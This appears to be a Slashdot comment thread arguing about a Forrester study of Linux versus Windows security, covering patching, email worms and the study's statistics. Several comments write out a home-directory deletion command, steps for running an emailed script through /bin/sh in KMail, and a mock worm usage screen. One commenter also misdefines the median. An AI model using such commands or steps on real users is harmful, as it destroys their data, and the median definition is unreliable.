I see what your saying, but the way package management is going, pretty soon Linux setups will just download security updates on their own, meaning that findning a binary to exploit will get really difficult. In the Windows world, if you find a buffer overrun, you can often assume that 95% of the Windows machines out there will also have the same exploit. In Linux, this wouldn't be the case even with many more users, as package management really takes care of things automatically.

Therefore, I believe that by quantifying the vulnerabilities and response time, Forrester is on the right track, they just need to take into consideration this response, and find a better method of quantifying the data.

I agree.

Re:some merit in the study

[Eberlin]

The popularity issue can be countered with the Apache vs. IIS deal where Apache's stability and security (and reaction to vulnerability) is much better. Just because something is popular doesn't mean it's not as safe merely because it's a bigger target.

The Open Source model definitely is an advantage as far as security goes. Having the code around can speed up bug detection and consequently, speed up fixes. There's also the fact that a programmer's name is at stake -- if you take pride in your work, you risk your reputation on it. On closed source stuff, Joe Programmer doesn't necessarily have the same reputation to lose.

The idea of "do one thing well" is also an advantage over "more features" because simplicity definitely reduces bugs. When things are cobbled together and interdepend on each other (IE/Outlook/ActiveX/OS), a security issue in one part can completely hose the others.

If someone were to attach a "your_paper.sh" and if someone did fire it up, it will definitely do damage...and anything that user has rights to becomes fair game. However, it'll keep enough of the system alive. If the machine is multi-user, the other users' data should not be affected.

For such instances, a clue-by-four or LART had always been the only solution I could think of. Until Peter Norton writes an Anti-Stupid, there's little hope there. (As one who has borked his machine...though not by worm/viruses, I could've used an Anti-Stupid for myself. The trick is to learn from those painful mistakes.)

Re:some merit in the study

[idiot900]

Can you actually write a shell script that takes control of the system?

Do you need to? I wouldn't give a flying SCO if my /usr/bin got nuked. It's my $HOME that I care about, and a worm only needs user privileges to kill that.

Re:some merit in the study

[moranar]

As the other poster said:

rm ~/* -rf

does all the damage you could want. I can reinstall Mandrake in under an hour, and finish updating in under 5. I can't recover all my data, unless I had a backup. But i think the intersection between "people who open unknown attachments" and "people who do regular backup" is 0.

Re:some merit in the study

[PygmySurfer]

I see what your saying, but the way package management is going, pretty soon Linux setups will just download security updates on their own, meaning that findning a binary to exploit will get really difficult. In the Windows world, if you find a buffer overrun, you can often assume that 95% of the Windows machines out there will also have the same exploit. In Linux, this wouldn't be the case even with many more users, as package management really takes care of things automatically

This is different from the "Windows world" how? Microsoft already has mechanisms in place for end-users to keep their machines up to date (Even some that'll download patches automatically, without user intervention). The problem is getting end-users to configure and enable those services. I don't see what Linux's package management has to do with it.

The real reason you won't see the same kind of wide-spread vulnerabilities in Linux is due to a more technical and security-minded user, NOT superior package management and automatic update systems.

Re:some merit in the study

[ImpTech]

Okay, but first the script would have to get root somehow. In windows its probably already at administrator level. Nevermind that the probability of it being executed in the first place is inherently lower, since no Linux mail client I know of will fail to complain when you ask it to execute an attachment. Further, I'm betting the permissions on the file default to non-executable, so you'd have to chmod it (or GUI equivalent)....

In any case, no study on OS security should care too much about vulnerabilities that are caused by fundamentally dumb users. If I were studying Windows vulnerabilities, the only email exploits I would include are the ones that execute without any user intervention, i.e. where you've done nothing more than preview/open the email.

Re:some merit in the study

[GreyWolf3000]

The real reason you won't see the same kind of wide-spread vulnerabilities in Linux is due to a more technical and security-minded user, NOT superior package management and automatic update systems.

I agree, but you missed my point. Microsoft has a mechanism for patching Windows, but not all those third party applications. I'm not sure if it can even patch software like Word. In the Linux world, all of your software gets to you through your OS supplier, which is a big differenc.

Re:some merit in the study

[Coryoth]

Like most linux geeks, I too believe that linux is much more secure than windows, but when asked why, I can only give some rant about how the open source methodology is superior and promotes faster response times to vulnerabilities. Either that, or I point to all the recent windows virus outbreaks.

SELinux. It kicks the crap out of any other readily available OS for security (except for some BSD forks that implement the same security model). It has security through isolation and least privilege built into the kernel itself - each and every process is assigned the abolute minimum amount of access it requires.

If you want to be able to say that Linux is more secure than Windows, use SELinux, because it very definitely and quantifiably will be.

Jedidiah.

Re:some merit in the study

[demaria]

" In the Linux world, all of your software gets to you through your OS supplier, which is a big differenc."

When has Redhat distributed updates to Listserv and slforum? Do they update proftp, Acrobat and RealPlayer for Linux too?

Re:some merit in the study

[Tony]

But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like "your_paper.sh" that most of us would trivially delete, but many would stupidly run (and these are the same users who would login as root to check their email).

Damn. Got another attachment-- "your_paper.sh". The "sh" must stand for "super-helpful." Cool.

Let's see if I can read it. Do I want to view it, or save it? Uhm... view it.

Gibberish. Starts with "#!/bin/bash". Should have known. Damn.

Let me save it. Then I can double-click it in my file manager.

Damn it! Same gibberish. Time to pull out the big guns, "Fucking Up Your Linux System For Dummies."

dummy@stupidhead> chmod a+x your_paper.sh
dummy@stupidhead> ./your_paper.sh

Usage: your_paper.sh [options] <level>

Where <level> is a natural number from the set [1-9]

Option is one of:

-a, --all Infect everyone in addressbook
-u <user> Infect only <user>
-s, --spam Invoke spam relay engine [default]
-e [1-9] Set embarrassment level of subject line
-m, --munge Destroy all files, for good measure
-d [1-9] Set debug level (9 = verbose)

dummy@stupidhead>

Good Damn It! I knew Linux was hard to use. I'm going back to MS-Windows, where everything is point-and-click.

Re:some merit in the study

[slipstick]

Not picking on you in particular but there seems to be something generally being missed here. Clicking on a shell script sent as an attachment isn't normally run by any e-mail program that I am aware of. The user's would have to save it to disk and than click on it. This doesn't make it an insignificant threat but seriously, how many user's of the type we're refering to would do this two step approach? Most would just delete it.

Re:some merit in the study

[Endive4Ever]

I think that you'd be advised to be worried if your /usr/bin got nuked. But the assumption so many people make that their system is 'secured' because /usr/bin can't be broken into by someone without root access is overhyped as a 'security' measure. /usr/bin can usually be spooled back off a CD. $HOME is the important stuff.

Yes, yes. We all backup our home directories twice an hour.

Re:some merit in the study

[slipstick]

I don't believe that's fair enough to the average user. There's no reason that clicking on an e-mail attachment should cause you to get a virus or otherwise harm your system. It is only because of Outlook's complete lack of security that this even happens. It isn't the user's fault.

I guarantee that any Linux based e-mail program that acted in this manner would be shunned so quickly it wouldn't see the light of day.

To be labled "dumb" a user should at least have to click on an attachment, save it to disk, mark it as executable and than double-click it, all without questioning whether this is a good idea or not.

Re:some merit in the study

[Tony-A]

If someone were to attach a "your_paper.sh" and if someone did fire it up, it will definitely do damage...and anything that user has rights to becomes fair game ...

If the machine is multi-user ...

So, set up a run-viruses-here user. World Writeable. Insecure compared to /tmp

I don't mind running a virus, but why would I want to do so as myself.
The advantage of a multi-user system is that I can simultaneously be several different "users" on several different machines and keep some degree of sanity.

Re:some merit in the study

[paj1234]

> Can you actually write a shell script that takes control of the system?

Yes, but you cannot get the user to execute it accidentally. For KMail users, the instructions are:

1. Right-click on the attachment
2. Click "Open With"
3. Type "/bin/sh" (without the quotes)
4. Click OK.

I have actually used this in the past, to run a "diagnostics" script on a customer's machine. I wanted to run various commands and have the results emailed back to me. The above method let me do that.

However, if the user simply clicks on the shell script, like any other attachment, then the user just sees the text in the script. To get round the lack of execute permission, you must tell the user how to execute it. This means asking the user to follow an off-putting sequence of scary instructions.

Furthermore, the shell script only runs with the user's permissions. The way to overcome that would be to know or guess the root password, unless the user is already root. Another possibility would be to find a buffer overflow in KMail which would allow the shell script to auto-run. However, no such vulnerability exists, as far as I know, in KMail.

Therefore, an email virus for the Linux platform is possible, but it will only work on those users brave enough to follow instructions that they probably don't understand. In other words, I believe the following statement is true now and will hold true in the future:

"To screw up Linux, you have to work at it. To screw up Windows, you just have to use it."

Re:some merit in the study

[Lukey+Boy]

I run Debian GNU/Linux (unstable) on this laptop, and the Stable version on several servers that I administrate for work. Guess what? apt-get update and upgrade on any of the machines will update all the packages. On this unstable system, upgrading will get me bug fixes, security fixes and new bugs (gotta love unstable). But on the work systems, where they're running Stable, they get nothing but bug fixes and security patches. It's simple, straight-forward and I put a hell of a lot of trust into the Debian community and they've not let me down yet. And all of the software is updated. Everything from mailing list software to the bug reporting tool, from the IMAP daemon to SquirrelMail. As for Acrobat and Realplayer - what in the hell would they be doing on either my office systems or home? I'm serious. I use XMMS and VLC, and they rock - playing every single file I throw at them without a hiccough. And Acrobat, yeah, uh... I could download that or just run xpdf, the KDE PDF viewier, or a myriad of other less-bloated applications. So yes, my distribution provider - Debian - does provide me with updates to all my software. And it works fucking beautifully.

Re:some merit in the study

[Lukey+Boy]

Apologies for the formatting. The one thing apt-get upgrade doesn't patch is me.

Re:some merit in the study

[some+guy+I+know]

pretty soon Linux setups will just download security updates on their own

Then all that a hacker need do is hijack a DNS server to cause a "security update" to be installed that contains an exploit.
(Cryto-signing security updates can prevent this in most cases.)

Re:some merit in the study

But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like...

You know, I hear this all the time and it is absolute crap! MSBlaster didn't require anything more than an active Internet connection; many of the recent vulnerabilties in Outlook don't require you to even view the e-mail message, let alone click an attachment; the latest round of IE vulnerabilties allow malicious sites to force a download and install without any intervention on the part of the user!

Stupid users are not the problem! And patching is not the answer! The answer is intelligent design and thorough testing; things that Microsoft has not been able to provide for over 10 years!

Re:If you think that mass-circulated study is bad.

[WindBourne]

Of course, the funny thing is that every company that has moved to linux swears up one side and down the other that it is quite a bit cheaper. Of course, what what else would they say?Oh, we made a mistake?

In this day and age, nobody seems to ever admit doing wrong.

Mark Twain echoed Benjamin Disraeli

[at10u8]

There are three types of lies: lies, damn lies, and statistics.

Local Vulnerbilities

[wasabii]

The idea is that these vulnerbilities don't have equal impact at all. Lets examine some of the unix security vulns i've seen in the last few months.

3 or 4 games, unsafe handling of common scoreboard files producing exploits.

WHAT THE HELL? That's Unix security for you... even GAMES that have vulns get attention. Windows only gets remotely exploitable vuln attention.

Consider how many windows programs use shared registry keys, consider how many read/write to common temp folders, or common locations on disk. Have any of the probably hundreds of overflows involved in reading a temp file from C:\Winnt\Temp been taken into consideration with WIndows? Heck no, nobody even cares. Windows too many remote vulns to even pay attention to stuff like that.

Consider gzip's unsafe handling of temporary files. I wonder how many Winzip/Windows Compressed Folders have? NOBODY HAS EVEN LOOKED.

Re:Local Vulnerbilities

[m_pll]

Consider how many windows programs use shared registry keys, consider how many read/write to common temp folders, or common locations on disk. Have any of the probably hundreds of overflows involved in reading a temp file from C:\Winnt\Temp been taken into consideration with WIndows?

And most of these shared locations are properly secured to begin with. If you can write to HKCU you can become the user, no need to exploit any buffer overflows. Same for HKLM - write access there is equivalent to having system/admin rights.

C:\winnt\temp is an interesting example. It's only used when profile is not loaded (otherwise your temp folder would be somewhere under Documents and Settings), but even then if you look at its security descriptor you'll see that files created by user A cannot be accessed by User B. The only way user B can hijack user A's temp files is if he can predict the name of the file that A is going to create, and manage to create the file in the short time window between the moment A checked that the file does not exist and the moment he calls CreateFile. And even then it will only work if A specifies "open existing" flag which is somewhat unusual for temp files.

In short, this is a valid attack vector but not nearly as bad as you made it sound.

wonder how many Winzip/Windows Compressed Folders have? NOBODY HAS EVEN LOOKED.

How do you know that? In fact I'm sure there have been a couple of similar exploits in the shell, and they have been fixed just like any other vulnerability.

Re:Local Vulnerbilities

[fedork]

Local Vulnerbility for Windows is pretty much an oxymoron - once you've got on a windows box you probably have full control (in most cases anyway, yes you can restrict access on a windows box, but how often is that the case?).

Factor of Many Things

O.S. Security is a factor of many things. Sure, the quality of code written is important. However, the most important factor is the administrative staff managing the O.S.

Additionally, an O.S. can be more secure than another but there is no such thing as 100% secure OS.

Security patches can be released the second a vulnerability is identified. The OS is only as secure as the people managing it. If the people managing the OS fail to patch the OS, the OS is going to be insecure even if the entity that engineered the OS is dilligent about patching their product.

Re:I recevied it in my mail and I couldn't believe

Puh-leez. The relatively few vulnerabilities that are discovered are normally patched within a *very* short time, just long enough to verify the bug, find the vulnerability, contact the code authors, and test the fix.

3 days from the first vulnerability report is typical, as shown when OpenSSH and Apache have shown obscure but potentially nasty vulnerabilities.

Microsoft gets as long as they want to play with it, becuase CERT and other security organizations do not publish the vulnerability until the vendor approves it. This has gone on for *years* with some of the underlying Microsoft graphical display system vulnerabilities, which are regularly circulated among the alt.2600 crowd of script kiddies but have never been published by CERT despite numerous reports because Microsoft has not published a patch and given their vendor blessing.

The Forrester report is dead wrong in half a dozen distinct ways, including the vast under-reporting of Microsoft vulnerabilities because no one *expects* it to be secure, and thus doesn't bother to report.

Re:If you think that mass-circulated study is bad.

[Spyro+VII]

In this day and age, nobody seems to ever admit doing wrong.

Yeah, especially since they didn't do anything wrong....

Go google it for yourself though.

I dub thee -1 Slashbot

Yes, because Mandrake, Red Hat et al exist solely for the community. They have no commercial interests, they do everything out of the goodness of their heart. Red Hat is more concerned about the community then its shareholders.

Lets go further, Red Hat exists solely for the promotion of peace on earth and the protection of the little people. It believes that Linux will end world poverty and stop wars.

Re:I dub thee -1 Slashbot

[Master+of+Transhuman]

Yeah, and Bill Gates gives millions to charity.

Oh, wait, I already pointed out that is a stock laundering scheme.

Never mind.

Article Summary

[big_groo]

"Is Linux more Secure than Windows?" *cough*Bullshit*cough* signed, Noah Meyerhans, Debian Vincent Danen, Mandrakesoft Mark J Cox, Red Hat Roman Drahtmueller, SUSE

These reports are useless

[ljavelin]

I remember reading a report from one of these big research firms (I think) in 1997. It was a report first published in 1994. It talked about how Apple would own the desktop (90% probablility), NeXT would be a power player (90% probability), and how GuptaSoft would drive most IT application (90% probability).

Funny, the report was ALL about WRONG. Nothing was close to reality. How did they get it SO WRONG?

In another situation, I was directed by Management to ask one of these big research firms about embedded database products. At the time they didn't have any expertise in that area. However, they found a kid internal to the company that was willing to learn so they could write a report. It seemed silly and convoluted. Here's a guy without the necessary understanding or expertise, and in a few weeks he's going to learn and gather enough information to write a report? A Report that other people will use to make decisions? Crazy!

In the end, I concluded that these reports are useless "on the ground". They're only useful for those who wish to pretend that they've done adequate research.

So my short answer is: These research firms exist to just cover butts and promote positions. Any IT management personnel that subscribe to their services should be FIRED. It's negligent to cite their reports; it's negligent to use them as a resource. If you need expertise, hire a consultant with REAL expertise, not a generic and biased report. If you want a biased report, the sales guys will come to you for free.

Re:These reports are useless

[ChrsJxn]

I think they miscalculated the sheer amount of money Microsoft was willing to pour into relatively risky business strategies, and then the amount of money they were willing to spend buying anything and/or everything that started to make money. Oh, don't forget about how if they couldn't buy it, they'd copy it and buy lawyers to win lawsuits.

Apple could have owned the desktop market. Considering how many people own computers, but don't know the first thing about how to use any sort of advanced features, you'd think Apple would be on top. Mostly because Apple crashes less often, and it's absurdly easy to use.

Unfortunately, Microsoft wins there too because they made a bunch of deals with hardware providers to exclusively sell computers with Windows, and Apple didn't want to do the same. At this point, most people who aren't technically inclined don't even think about what OS they're using, they just go down to the local Dell (Yes, they actually have stores, as scary as that is.), and pick up a cheap Windows machine.

Guess this just goes to show you. Statistics are great, for telling you what everything was like yesterday.

Re:These reports are useless

[K8Fan]

I used to work at Forrester (developed a web site for them and served as the token geek). The unofficial company motto is: "We only have to be right more than 50% of the time".

Re:These reports are useless

This is not just in IT but also in electronics, where i used to work.

A new type of chip scale packaging was suposedly hot, lots of research firms gave figures on how it would dominate the market in "just a few years time". Guess what, it still hasn't.

www.forrester.com runs Solaris

[olddoc]

Check out http://uptime.netcraft.com/up/graph/?host=www.forr ester.com

At least they aren't running IIS on Windows 98!

No matter who says what

[pair-a-noyd]

I'm staying with Linux and my money goes with Linux. After two years of running Linux I've not been hacked once, I've not gotten ONE SINGLE VIRUS, I've not had to look at one single pop-up add that I didn't want to look at, I've not had to look at one single BSOD, I've not had to reboot one single time unless I chose to.

I don't have to spend all my time in a panic worried about patches and viruses and other such nonsense. Neither do my friends and family, I converted them to Linux too. Now I don't have to worry about them either.

What does Windows offer me that I can't do with Linux? Nothing. Why should I use Windows which is constant trouble and extremely high maintenence and is a constant cash drain, versus the ONE TIME PURCHASE (if I choose to purchase v. free download) of a Linux distro, in my case Suse, that is mine, with no strings attached and will cost me no further money, ever?

Once I own the $89 Suse distro I never have to spend another penny on it or any other software, ever. It works. It's secure. Anyone that says it isn't is a stupid SOB or a liar or both.

Re:No matter who says what

[bruthasj]

Now if I can get that darned IBM T30 to suspend without crashing X and KDE, and if Qt didn't crap out on double-byte Chinese fonts, I might buy into the "It works" portion of your rant. Yes, I've upgraded kernels 2.4.x, 2.6.x, blah blah. ACPI don't work. And APM bugs out.

(BTW, I run Linux exclusively on my IBM T30 .. no windows at all. In fact, I run several flavors in chroot environments on both the laptop HD and an external USB HD.)

ease of use vs. security

[kardar]

I remember once I installed OpenBSD on an old SparcStation 1+ (that's 25Mhz) with a 1gig scsi drive. I was new to it, and so when the install process asked what "security level" I wanted to install at, I installed at one below the most secure. It was very strange. Very hard to get anything done, it had no path.

I changed the security level to "normal" because I just got freaked out by how strange it was; I only wanted to see if I could get the box running at all, and the heightened security level was making life difficult.

So the real study that someone should do, is how "ease of use" affects "security". Because that's where the real deal is at. It's just like having to go through the lines at the airport - the more secure we need to be, the more of a pain it is for everyone.

There is definitely an inverse relationship between "ease of use" and "security". Seeing as how there is a big focus on making Linux easy to use, or at least it seems to me that there is; I get the feeling that people won't accept Linux if it's not as easy to use as Windows or OS X, I wouldn't be surprised to see Linux security, or "user friendly" Linux security suffer a little bit.

But still, Linux has been designed from the outset with security in mind; other user-friendly OS's are designed for ease of use. It's going to take some time, but we are slowly going to move in the right direction. If Linux is a secure OS now, and some consultancy group says that it isn't, then the trick would be to make it LESS secure by making it more user-friendly, and immediately, consultancy groups and analysts will be saying that it is secure. But that's a sacrifice that's not really worth it. However, unfortunately, given the open nature of Linux, and that fact that it can go in many directions, we will probably see Linuxes that are less secure than they could be because of the focus on user-friendliness. So I guess that means that analysts are going to change their minds? I wouldn't be surprised.

It's not a horrible report

[digidave]

It's fair given administrators who only patch based on official distribution releases. It seems to not care that they are making Linux companies responsible for a lot of 3rd party software such as Apache. It stands to reason that their average patch release would be slower if they're maintaining thousands of applications. It's more important that they release OS updates and core software updates quickly. Their customers have to take some responsibility for updating 3rd party software even if it does come on the same CD as the distro.

Perhaps of more concern to administrators should be the nondisclosed vulnerabilities found by researchers such as eEye that are not patched. I can't find the link now, but eEye alone has dozens of vulnerabilities they've let MS know about, but haven't been patched for sometimes hundreds of days. eEye is just being courteous by non disclosing the bugs until MS fixes them. By using the disclosure time as a 'start time', Forrester is ignoring lead time developers get. It's my experience following Bugtraq and Full Disclosure mailing lists as well as many OSS projects that most major OSS developers respond quicker to their lead time before disclosure.

Forrester is completely ignoring vulnerabilities that are not public knowledge, which is misrepresenting the problem.

Re:It's not a horrible report

[stackentol]

What I wonder is if they actually included flaws in all software in the distros. That would be comparable to Windows plus IIS, Exchange Server, Office, streaming servers, SQL Server (times X) and just about anything else they offer. Oh how nice those numbers would add up.

Re:If you think that mass-circulated study is bad.

i stopped when i saw the line- Yankee group. Just did a quick skim and there was our favorite analyst spouting off something- what a Didiot!!

All those "Linux" vulnerabilities?

Wonder how one can compare the number of vulnerabilities of a complete GNU/Linux distributions against Windows!

Windows will never be proven superior

[TechniMyoko]

Cause /.ers keep denying the evidence is real

p.s. -- replying to my own post

[kardar]

I just thought of this. It's a fine line between how secure you want something to be, and how much of a pain it is. It's the whole 9/11 thing. Too much security is a bad thing, because it shuts down the economy, and makes life exceedingly difficult, not to mention that it affects freedoms that we are used to. We hear this kind of talk in the media all the time. It's a fine line - too little security, disaster happens - too much, life gets difficult and the economy suffers.

So the fact that it takes a certain amount of time to respond to security problems is indicative of the superior nature of Linux. Even though some analyst may say that this is technically not as secure as something else, with Linux you can let things slide a little more because that's just the kind of OS it is. The distros are "on top" of it, because still, nothing bad really happens. That's the test - what bad happens. If nothing bad happens, it doesn't matter how you look at it, because the bottom line - your data is safe.

Furthermore, if need be, you can "crank up" the security level in Linux. Way up. National security level. Hardened. Trusted. It's just unnecessary, and makes it harder to use for non-critical situations.

So look at the bottom line, and look at the ability to crank up the security level. Windows has very little ability to crank up any security level, it needs hardware to do that. Linux can crank up the security without needing specialized hardware.

Linux is superior, and the fact that it is "less secure than Windows", yet nothing bad happens, just goes to prove how technically superior it really is. These analysts have just shown how superior Linux really is.

Re:p.s. -- replying to my own post

Furthermore, if need be, you can "crank up" the security level in Linux. Way up. National security level. Hardened. Trusted. It's just unnecessary, and makes it harder to use for non-critical situations.

Ahhh, yes... but suppose you work for the DoD (some of us might, around here :) and you have a server that's supposed to be able to serve information classified at Top Secret to one user (who has the appropriate access rights and is logged in to your multi-user system), and information that is merely Confidential to another user who only has clearance at that level.

At that point, you'll be damn happy your OS is hardened appropriately :)

very slanted

[bangular]

These reports are so dumb. In high school, I remember learning that averages don't give a good representation, because extremes will skew the numbers. The median is a better representation. Funny how some people don't seem to remember that. By Forrester's methods of research, they could come to the conslusion that the average american has one testicle (statisticly true btw).

Re:very slanted

[anagama]

I don't know whether to mod you funny (testicle comment) or insightful (statistics comment). We need a "Funny but True" option!

Re:very slanted

[Cecil]

In high school, I remember learning that averages don't give a good representation, because extremes will skew the numbers. The median is a better representation.

First of all, it's called a "mean", not an average. It's a type of average. The median is also an average. So is the mode.

Secondly, the median is not necessarily a better representation, just different. With the median, for example, you have *no idea* whether there are any extreme outliers. 1,1,2,5000000,90000000000. Median is 2. Is that representative of that set of numbers? Not really. The mean would give you a much better idea of what range of numbers you're dealing with in that case. That's why real statistics with distribution curves and standard deviation are important.

Anyway, I'm done nitpicking. I agree that these reports are blatantly skewed. This is not really a surprise. Almost all research is funded and biased these days. Much like news media. It's a simple fact of life. The important thing is to know your source, and try to understand their motivations.

When the next "scientific study" comes along saying that P2P increases music sales, no matter how much you believe that to be true, you need to take a look at who's writing it, and why. Is this some graduate student who is probably downloading his own MP3s all the time and just trying to justify their habits to the world? Perhaps not, but it's wise to make sure before you start throwing his or her study around as if it were gospel.

Sorry if that sounded as if it was directed at you, it wasn't really. It's just some good advice (in my opinion).

Re:very slanted

[ChrsJxn]

Actually, the average American has LESS than one testicle (more women than men, and some eunuchs too), unless there are a great number of people floating around here somewhere that have three. I can so imagine someone putting this in the census: "Please list the names and ages of each person in your household, as well as the number of testicles per person".

Re:very slanted

[natrius]

So... if they used the median instead, they would come to the conclusion that the average American has no testicles since there are more women than men in America. Is that really any better? I don't want North Korea thinking we have no balls.

Re:very slanted

First of all, it's called a "mean", not an average. It's a type of average. The median is also an average. So is the mode.

Rubbish. The word "average" has several meanings, but one of them is a synonym of "mean" in the statistical sense.

The average, the median, and the mode are all measures of the center of a distribution. Presumably that's what you meant.

Re:very slanted

[BlackHawk-666]

Since the population is slightly skewed (IIRC) towards women (~51%), and we are choosing to round down, I'd say the average American has no balls, mainly due to rounding errors ;->

Re:very slanted

Bingo. And the parent poster seems upset that his measure of centre doesn't give him a good idea of the outliers. Well, DUH. You need a measure of spread for that:

e.g. to take his example 1,1,2,5000000,90000000000
the median is 2, the first quartile is 1 and the third quartile is 4.5e10, which gives a very good idea of the spread *and* the skewness (much better, in fact than "mean=1.8e10" and "variance=1.62e21"

Re:very slanted

We need a "Funny but True" option!

Isn't that what "Troll" is for? :p

Re:very slanted

if they used the median instead, they would come to the conclusion that the average American has no balls.

The mode would be zero. The mean would be 1 (rounded to the nearest whole number) and the median would be 1.

All three are averages, but the measure different things. Mode is the most frequent number, mean is the sum of all the numbers divided by the number of numbers, and median is the lowest number subtracted from the highest number, and that result is divided by two.

IMNSHO, any report that states "average is", without stating whether it is the mode, mean, or median, is a report written by a PR flack, and has only a passing resemblence to marketings beliefs about the value of the product, and no resemblence at all to the product being advertized.

Re:very slanted

[Sepper]

You can make numbers say whatever you want. You just have to use Simpson's paradox

Re:very slanted

[maduro55]

I was lucky and got both of my balls back after my divorce.

Re:Analyst hacks will never bit the hand that feed

[WebCowboy]

You are right in your suspicions that these sort of "studies" are commissioned by Microsoft as part of their marketing strategy (just part of the business--Oracle, Sun, IBM etc parade studies flatter their products as well after all). However, I don't dwell at all on these sorts of studies and I certainly wouldn't give them any meaningful weight when making a decision on deploying Linux (or not).

Even given the positive spin towards Microsoft, however, Forrester's comments on the study are a barely lukewarm endorsement of Microsoft, and don't seem to be too critical of Linux. Check out some of the comments by Forrester analyst Laura Koetzle:

Surprisingly, Microsoft did the best job at patching vulnerabilities fast, even though it ranked at the top with the largest percentage of its security holes rated as high

So they DID acknowledge that Microsoft's platform had the most HIGH RISK vulnerabilities, althought this fact is glossed over in the article. Koetzle also acknowledges that the study did NOT look at how WELL the patches addressed the problem (MS often needs to issue more than one patch to get it right, and sometimes they fix one bug and introduce another).

"The fact that the Linux distributors fixed such a high percentage of their vulnerabilities is a remarkable achievement," she said. "Even Debian, in last place, was pretty darn thorough."

Sure doesn't sound like something you'd expect an MS-paid cheerleader to day about the competition...

This is very much a case of your mileage may vary

Translation: even if patches are made fast they can still leak...

The bottom line? Any of these platforms can be operated securely

Quite the ringing endorsement for MS ain't it? Nice to see their people so solidly back their studies...

Exponential Security

[argoff]

One thing that I don't see mentioned is that as the gnu/linux base grows larger, so do the proportion of competent developers who can spot and fix code security problems before they go mainstream. With MS, the number of people looking to spot code security problems reamins constant no matter how big the user base.

Although I've herd MS say that the reason Linux hasn't had as many big security problems is because they aren't used as much, I think the truth will turn out to be just the opposite. Not to mention that a hacker who finds a security flaw in Linux is more tempted to get fame by reporting it, and that fame becomes more prestigious as Linus grows, but a hacker who finds a security flaw in windows will be more tempted to gain fame by exploiting it.

Actual Conversation

[cgenman]

"You know, ever since I upgraded to Windows XP I haven't had a single Blue Screen of Death."

"Does it randomly reboot?"

"Sometimes."

"You have automatic reboot on. It's like a Blue Screen of Death, but without the pretty colors."

Re:Actual Conversation

I've been running Win2K Pro for about 9 months, I don't remember a single OS crash. I've had many MSIE crashes, but always when I had 20-30 browser windows opened and a bunch of other apps.

On my other, Linux, system, I've had zero crashes but browser has been equally bad, even worse (considering that overall browser slowness on Linux wastes more time than occassoinal restarts on Windows).

I also run a free personal firewall for Windows and I've never had any security problems with it.
On Linux, I've spent days fscking with iptables and every small reconfiguration is a big waste of time 'cause I have to remind myself of the way the goddamn rules work.

On the updates site, Windows downloads them automatically and that's great. Linux can do that but I cannot because a bunch of apps depend on other apps so I cannot allow (or even afford to fix) all "vulnerabilities". For example I have several weird h/w devices that require custom kernel modules, FreeSWAN, etc. - I don't want to do kernel update just becuase I'd have to deal with at all that mess again.

From own and customers' experiences I've found Windows to have lower cost of ownership (yeah, laugh all you can) in SOHO/SME environment.
For other situations (SANs, etc.) it depends - since one has to use an Enterprise version of Linux (because of storage compatibility), it's almost the same expensive as Windows OS.
Apps that go on top of it (Oracle, J2EE, etc.) cost the same, so when you add extra training and support, it's hard to make considerable savings using Linux, so why bother.

Personally I use Linux more than Windows, but I'd say it's not perfectly suitable for most companies (yet).

It's just another OS... Once it's mature and as convenient as Windows, MS will open their source and lower the price (hell they could even buy Red Hat from their pocket money).

Most companies don't care, and they shouldn't, which OS they use as long as it's good enough, and both Windows and Linux are almost good enough.

Re:Actual Conversation

[timmarhy]

fuck off and post with your real man then if this is all true

Re:Actual Conversation

wtf have you been smokin?

Re:Actual Conversation

huh?

I don't know what you tried to say, but I work support. Trust me, it does reboot just when you least expect it. In my case, it's mostly NVidia's crappy drivers.

Re:Analyst hacks will never bit the hand that feed

Yes, that would be the point he's trying to make.

The point he is proving is this:

Any slashdot story concerning Microsoft is so biased as to be useless. It's a circle-jerk for fanatics bordering on the religious, a bout of self-affirmation for a group slightly more fanatical than Mac owners. A report against Microsoft is published? Praise it to the heavens! A report in favor of Microsoft is published? Doubt the data, impugn the source and repeat the mantra "M$ is bad, mmkay?".

Posted as an AC so the cocksucking slashbot moderators who have failed to read and understand (or independently realize) this don't gratuitously destroy my karma.

- Muttley

Couldn't resist ;)

Run, Forrester, run!

Not all Linux vendors have an open process

Red Hat, for one, has internal bugs that aren't viewable to the general public - often including the person that reported the bug in the first place.

My responce

[Felinoid]

How many viruses run under Windows? Answer: How many are in the wild?
How many viruses run under Linux? Answer: Zero

This isn't to say that there are no Linux viruses. Oh hells bells there probably are many (in a lab some place) and one released.

BUT with a quick bug fix the Linux virus went away. Bye bye. It is fairly likely the lab viruses make use of one time defects that have long ago been fixed.

It is reasonably easy to update open source software. So if the latest libary has problems with your favoret apps you download the updates of the apps as well.

With Windows those same updates cost money. Fixing a hole in Windows security may cost you quite a bit in rebuying the applications you rely on.

There is also a pure addatude problem.
In Linux each person takes his share of responsability for being hacked.
The programmers appologise and release a bug fix ASAP.
The destros who didn't catch the bug and released the defective code release the bug fix with applogys.
The admin who get hacked are redfaced for not catching the bug and appologise.
The users smash head into wall for not armoring against attack. Not making back ups. Not taking nominal precautions.

Microsoft:
Most of the antimicrosoft slams Linux and Mac zellots repeate often come from Windows users who blame everyone but themselfs.
Windows admin have a pack of excuses so thick it makes you sick.
Application develupers "Well it happends you gotta expect it. Not our problem. Should have protected yourself.
For $5,000 we'll audit your systems so this won't happen again"

And Microsoft pays for reports on how OTHER operating systems are just as bad (or worse) instead of preventing the mistakes.

In short:
Linux: My fault sorry I'll fix it. Won't happen again (at every level)
Microsoft: Not my fault. Your fault. You fix it. I can't be held responsable for YOUR stupidity. (at every level)

This isn't even an open vs closed issue however maybe the open and closed source communitys do inspire thies addatudes.

This dates back to the original GNU and Microsoft addatudes way back in the 1980s.

GNU: Everyone is responsable.
Microsoft: Your so stupid it's all your fault.

If I hear again how smart Microsofts programming team is again I'll throw up.
That is the single most arrogent peace of bull I've heard.

If Microsofts programmers are so smart then I'm Enstine. Microsofts coders make the kind of mistakes every day "I" knew to avoid when I writing my own "Hello world" on a Commodore Vic 20 in 1979.

Re:My responce

[BCW2]

To be accurate, as of today on my Winxp box Fprot has protection from:
Viruses and Trojans
48091 DOS/Windows
404 Unix/Linux
and 48211 other destructive programs.
This count changes every few days on the Win side and not in a month for Unix/Linux.

Which one is more vulnerable? You decide.

Re:My responce

What does that mean? It means that more virus/trojan writers target Windows. And why? Because Windows has a larger user base.

Re:My responce

[BCW2]

